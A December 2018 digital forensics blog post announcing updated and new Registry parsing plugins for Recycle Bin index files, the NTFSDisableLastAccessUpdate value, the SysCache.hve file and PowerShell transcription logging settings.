Tuesday, December 18, 2018

Updates

Based on some testing that Phill had done, I recently updated my Recycle Bin index file ($I*, INFO2) parser.  Since then, there have been some other developments, and I wanted to document some additional updates.

NTFSDisableLastAccessUpdate
We have seen recently that, apparently, as of Win10 1803 there have been changes made to the NTFSDisableLastAccessUpdate value in the Registry (David, Maxim).  In short, rather than the "yes" or "no" (i.e., "1" or "0") value data that we're used to seeing, there are a total of 4 options now.

I've updated the disablelastaccess.pl plugin accordingly.

SysCache.hve
Maxim shared some interesting insight into the SysCache.hve file recently.  This is a file whose structure follows that of Registry hive files (similar to the AmCache.hve file), and is apparently only found on Win7 systems.

There's some additional insight here (on Github) regarding the nature of the various values within some of the keys.

I created the syscache.pl plugin to parse this file, and to really make use of it, you need to also have the MFT from the system, as the SysCache.hve file does not record file names; rather, it records the MFT record number, which is a combination of the entry number and the sequence number for the file record within the MFT.

PowerShell Logging
As my background is in DFIR work and not system administration, it was only recently that I ran across PowerShell Transcription Logging. This is a capability that can be enabled via GPO, and as such, there are corresponding Registry values (in addition to the use of the Start-Transcript module, which can be deployed via PS profiles) that enable the capability.  There's also a Registry value that allows for timestamps to be recorded for each command.

This capability records what goes in with PowerShell during a session, and as such, can be pretty powerful stuff, particularly when combined with PowerShell logging.

To see what PowerShell transcription logging can provide to an analyst, take a look at this example, provided by FireEye, of a recorded Invoke-Mimikatz script session.  Here's an example (also from FireEye) of what the results of module logging looks like for the same session.

As these settings can inform an analyst as to what they can expect to find on a system, I created the pslogging.pl plugin.  However, a dearth of available data has really limited my ability to test the plugin.

*Note: This post was originally authored on 9 Dec 2018

No comments: